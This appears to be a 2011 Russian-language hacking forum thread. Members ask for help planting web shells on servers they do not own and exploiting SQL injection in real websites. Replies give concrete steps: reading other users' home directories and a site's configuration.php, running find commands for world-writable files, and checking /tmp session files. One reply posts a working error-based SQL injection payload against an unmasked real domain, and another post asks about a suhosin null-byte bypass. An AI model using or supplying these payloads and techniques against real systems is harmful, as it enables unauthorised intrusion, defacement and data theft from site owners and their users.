Старый 24.08.2011, 08:43   #1251
.grom.
 
Регистрация: 13.08.2011
Сообщений: 19
Репутация: 0
По умолчанию

Народ) собсно такой вопрос...
Вообщем есть скуль с правами Y, но нет папки на запись... инклуда тоже нет = \
Вообщем то нарыл доступ по ssh к этому серверу.....
но права у юзера уг
у моего юзера например директория /home/myuser а сайт лежит в дириктории /home/siteuser/
Можно ли как то залить шелл в корень сайта?)
Порутать сервак не получится = \ т.к.
Linux 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux
Есть какие нибудь варианты как залить шелл ?))
.grom. вне форума   Ответить с цитированием
Старый 24.08.2011, 11:09   #1252
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

Цитата:
Можно ли как то залить шелл в корень сайта?)
залить шелл в корень сайта можно,если права совпадают с владельцем целевой папки или,если повезет с чмодом, группой владельца целевой папки.(Как этого добиться - вариантов немало)



Цитата:
Есть какие нибудь варианты как залить шелл ?))
куча.Возможно доступа нет только к корню нужного сайта,а к папке,допустим,images - есть доступ и возможно даже права на запись в нее.


example:
ls -la /home/ & ls -la /home/siteuser/ & ls -la /home/siteuser/some_ex._dir/ & cat /home/siteuser/configuration.php
бла бла бла.ога?
snake вне форума   Ответить с цитированием
Старый 24.08.2011, 14:46   #1253
.grom.
 
Регистрация: 13.08.2011
Сообщений: 19
Репутация: 0
По умолчанию

Цитата:
(Как этого добиться - вариантов немало)
Будь) добр) подскажи) или тыкни носом)
Цитата:
куча.Возможно доступа нет только к корню нужного сайта,а к папке,допустим,images - есть доступ и возможно даже права на запись в нее.
Я через winscp гуляю по серверу.
Доступ к корню есть, читать файлы могу, редактировать нет.
В корне сайта стоит чмод 775 визде и на все)
шелл на серваке есть) но не в директории сайта который доступен из веба)
вообщем хз что тут делать...
.grom. вне форума   Ответить с цитированием
Старый 24.08.2011, 15:11   #1254
Raz0r
 
Аватар для Raz0r
 
Регистрация: 17.07.2010
Сообщений: 100
Репутация: 78
По умолчанию

смотри /tmp, возможно у файлов сессий неправильные права
также к размышлению https://rdot.org/forum/showthread.php?t=1565

и я так понял ты смотрел права вручную, попробуй поискать в корне целевого сайта все директории и файлы с чмод 777:
find . -type d -perm 777 -print
find . -type f -perm 777 -print

Последний раз редактировалось Raz0r; 24.08.2011 в 15:19..
Raz0r вне форума   Ответить с цитированием
Старый 26.08.2011, 16:26   #1255
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Ребят, помогите разобраться на примере двух сайтов.
Тут http://www.***.com/view.php?profile=114898(inj) не могу подобрать кол-во полей ни в какую.Эррорит все время.
Тут http://www.***.com/mail_friend.php?bf_id=12535+order+by+5--+&rnum= не могу добиться вывода. Во всех уязвимых скриптах которые удалось обнаружить.При составлении запроса с якобы верным кол-вом полей, все равно возвращает не ту страницу. В силу отсутствия опыта я обращаюсь к вам за помощью.
Если у вас что либо выйдет, буду премного благодарен, если сопроводите результат небольшим пояснением на этом примере.

Последний раз редактировалось Twost; 17.05.2013 в 12:17..
Consistent вне форума   Ответить с цитированием
Старый 26.08.2011, 16:39   #1256
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

http://www.***.com/view.php?profile=114898 тут два запроса подряд идут, и вывода помоему нет в обоих
зато есть вывод ошибки, значит можно юзать error-based sql
Код:
http://www.singlemenonline.com/view.php?profile=114898+and+1=(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+MID((select+version()),FLOOR(RAND(0)*2),64))+--+
во втором мускул 3.x
Код:
http://www.***.com/mail_friend.php?bf_id=12535+and+substring(version(),1,1)=3--+&rnum=

Последний раз редактировалось Twost; 17.05.2013 в 12:17..
Andrey1800 вне форума   Ответить с цитированием
Старый 26.08.2011, 17:22   #1257
Consistent
 
Регистрация: 06.12.2010
Сообщений: 26
Репутация: 0
По умолчанию

Andrey1800
Cпасибо большое. Пробую.
Consistent вне форума   Ответить с цитированием
Старый 26.08.2011, 23:15   #1258
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

suhosin обходиться на данный момент? (у меня не сработал %00, и его альтернативы)
}{оттабыч вне форума   Ответить с цитированием
Старый 29.08.2011, 10:28   #1259
GufDead
 
Регистрация: 29.08.2011
Сообщений: 2
Репутация: 0
По умолчанию

Приветствую :3
Тут у меня вопросик появился. Я с шеллами недавно стал копаться, и столкнулся с одной проблемкой, которую пока не нашел как обойти (искал на ачате и здесь).
А конкретно интересует вот это (цитата одного из форумчан):
"Закачать прямо с компа полноценный шелл (сплойт) в любую папку, доступную на запись (не из веба) и выполнить его (например, чтобы порутать сервер и залить шелл уже куда угодно и по всем понятиям) - это три."

можно ли поподробнее? Я столкнулся с ситуацией, что шелл не может редактировать индекс и другие файлы, да и вообще, директорий с разрешением на запись всего две.. Буду премного благодарен, если объясните как получить полноценный доступ, или сможете показать решение данного вопроса на каком-либо из форумов (искал, но упоминается только вскользь, наподобие этой цитаты).

P.S. До этого писал одному из форумчан в асику, он не ответил к сожалению =\
GufDead вне форума   Ответить с цитированием
Старый 29.08.2011, 11:06   #1260
salut
 
Регистрация: 07.04.2011
Сообщений: 65
Репутация: 0
По умолчанию

Ссылка
помоему ето sqli..
ну не как не могу дальше раскрутить..помогите

Последний раз редактировалось Twost; 17.05.2013 в 12:18..
salut вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot